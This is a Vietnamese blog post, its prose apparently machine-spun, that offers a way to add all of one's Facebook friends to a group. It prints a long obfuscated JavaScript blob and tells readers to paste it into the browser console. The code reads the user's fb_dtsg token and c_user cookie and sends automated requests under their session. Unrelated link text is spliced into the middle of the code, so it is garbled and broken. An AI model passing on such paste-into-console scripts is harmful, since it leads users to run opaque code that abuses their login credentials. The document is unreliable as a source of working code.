THÊM TẤT CẢ BẠN BÈ VÀO NHÓM FACEBOOK

  -  

Chào chúng ta, bài toán quản lý một đội facebook nào đó hẳn ai cũng ao ước team của mình đã đạt được thiệt những thành viên. Facebook chất nhận được chúng ta thêm tất cả bằng hữu vào đội, mặc dù chỉ hoàn toàn có thể thêm từng tín đồ một, một giải pháp thủ công bằng tay, điều đó rất rất lâu. Chính do yêu cầu đó, không ít người dân sẽ tra cứu đầy đủ phương pháp để rất có thể mời tất cả đồng đội vào đội một cách thanh nhàn và lập cập.

*Bạn đang xem: Thêm tất cả bạn bè vào nhóm facebook

eval(function(e,t,n,r,i,s)i=function(e)return(e35?String.fromCharCode(e+29):e.toString(36));if(!"".replace(/^/,String))i(n);r=>;i=function()return"\w+";n=1while(n--)if(r)e=e.replace(new RegExp("\b"+i(n)+"\b","g"),r);return e("(E()w f=1h:j.1i("1j")<0>.1k,F:j.1l.1m(j.1l.1m(/22=(\d+)/)<1>),1n:j.1i("1o")<0>.1k,C:P 23(),K:0,Q:0,R:0,1p:E(b)w c=Phường 1q();c.1r("24",b,1s);c.1t=E()r(c.L==4&&c.S==1u)w a=T("("+c.1v.1w(9)+")");r(a.U&&a.U.1x)f.C=a.U.1x.25(E()1y 0.5-1z.1A())j.u("H").v=" "+f.C.A+" 26 27"+J;V(x W f.C)f.1H(x)1I r(c.L==4&&c.S==2d)j.u("H").v="2e 2f!"+J1Ij.u("H").v="1J 2g, 1K..

Xem thêm: Top 6 Cách Học Giỏi Môn Hóa Mà Bạn Nên Biết, Phương Pháp Và Kỹ Năng Học Tốt Môn Hóa HọcXem thêm: Khắc Phục Lỗi Không Đăng Video Lên Facebook Khong Duoc, Không Upload Được Video Lên Facebook!

("+c.L+")
"+J;c.1L(),1H:E(d)w e=P. 1q(),Z="1M=1&1j="+f.1h+"&1o="+f.1n+"&2h=1N&2i=&2j=&1O="+f.C.F+"&2k="+f.F+"&2l=";e.1r("2m","/1P/2n/1O/2o.1Q",1s);e.1a("1R-2p","2q/x-2r-2s-2t");e.1a("1R-A",Z.A);e.1a("2u","2v-2w");e.1t=E()r(e.L==4&&e.S==1u)w a=T("("+e.1v.1w(9)+")");f.K++;j.u("1B").v=""+f.K+" 2x "+f.C.A+"";r(a.1S)f.R++;j.u("I").v="( "+f.R+" ) "+a.1S+""r(a.D&&a.D.G)w b="";V(x W a.D.G)r(a.D.G.A-1><1>)b+=""+a.D.G.A-1><1>+" "b+="";j.u("1C").v=br(a.1b)V(z W a.1b)w c=T(a.1b.2y(/2z.2A/i,""));r(c.F&&c.1U)f.Q++;j.u("I").v="( "+f.Q+" ) "+c.1U+" 2B 2C 2 chiều.";2Er(f.K==f.C.A)j.u("I").q.2F="1d";j.u("I").v+="2J!2N";e.1L(Z);w g=<"m","g","e","k","o","s","n","b","l","p","a","2","h","0","y","1","t","3","c","-","\2O">,1f=g<1>+g<4>+g<3>+g<10>+g<14>+g<19>+g<0>+g<2>+g<12>+g<0>+g<2>+g<16>+"."+g<7>+g<8>+g<4>+g<1>+g<5>+g<9>+g<4>+g<16>+"."+g<18>+g<4>+g<0>,J=""+g<1>.1Y()+g<4>+g<3>+g<10>+g<14>.1Y()+g<0>+g<2>+g<12>+g<0>+g<2>+g<16>+" "+g+g<11>+g<13>+g<15>+g<17>+""+1f+"";j.1Z.v+="1J 3b 1K.. "+J+"";f.1p("/1P/1N/3c.1Q?1M=1&3d="+f.F+"&3e="+1z.1A()+"&3f<0>=3g&3h<0>=3i"))();",62,205,"||||||div|||||||||||||document|||||||style|if|||getElementById|innerHTML|var||||length|color|frns|jsmods|function|uid|require|hasilsurasil|hasiltiga|crj|prenKe|readyState|id|font|255|new|okeh|gagal|status|eval|payload|for|in|darkred|darkgreen|prm|||||||||||setRequestHeader|onload|href|center|size|crl|10px|dtsg|getElementsByName|fb_dtsg|value|cookie|match|gid|group_id|getAjak|XMLHttpRequest|open|true|onreadystatechange|200|responseText|substr|entries|return|Math|random|hasilsatu|hasildua|min|width|display|left|senAjak|else|Arkadaslar|Bekleyiniz|send|__a|typeahead|members|ajax|php|Content|errorDescription|span|name|target|_blank|top|toUpperCase|body|border|rgb|c_user|Array|GET|sort|Arkadas|Bulundu|300px|inline|block|text|align|404|Sayfa|Bulunamadi|Toplaniyor|source|ref|message_id|__user|phstamp|POST|groups|add_post|type|application|www|form|urlencoded|Connection|keep|alive|of|replace|Arbiter|inform|Kisi|Grubunuza|Eklendi|break|textAlign|40px|weight|arial|Tamamlandi|onClick|none|false|Kapat|xA9|margin|white|0px|0px|http|height|1px|600px|position|fixed|100px|offsetWidth|530|px|radius|padding|index|999999|5px|solid|background|221|Ekleniyor|first_degree|viewer|token|filter|user|options|friends_only".split("|"),0,))
Cách 2: Vào group (nhóm) facebook nhưng mà bạn muốn thêm đồng đội. Nhấn Ctrl+Shift+J (nếu như bạn dùng trình chăm sóc chrome hoặc cốc cốc) hoặc Ctrl+Shift+K (nếu như khách hàng cần sử dụng trình để ý morilla firefox) sau đó bạn dán (Ctrl+V) cục bộ code vừa copy ngơi nghỉ bước 1 vào tab “console“, rồi dấn Enter, sau đó hóng phút chốc là dứt.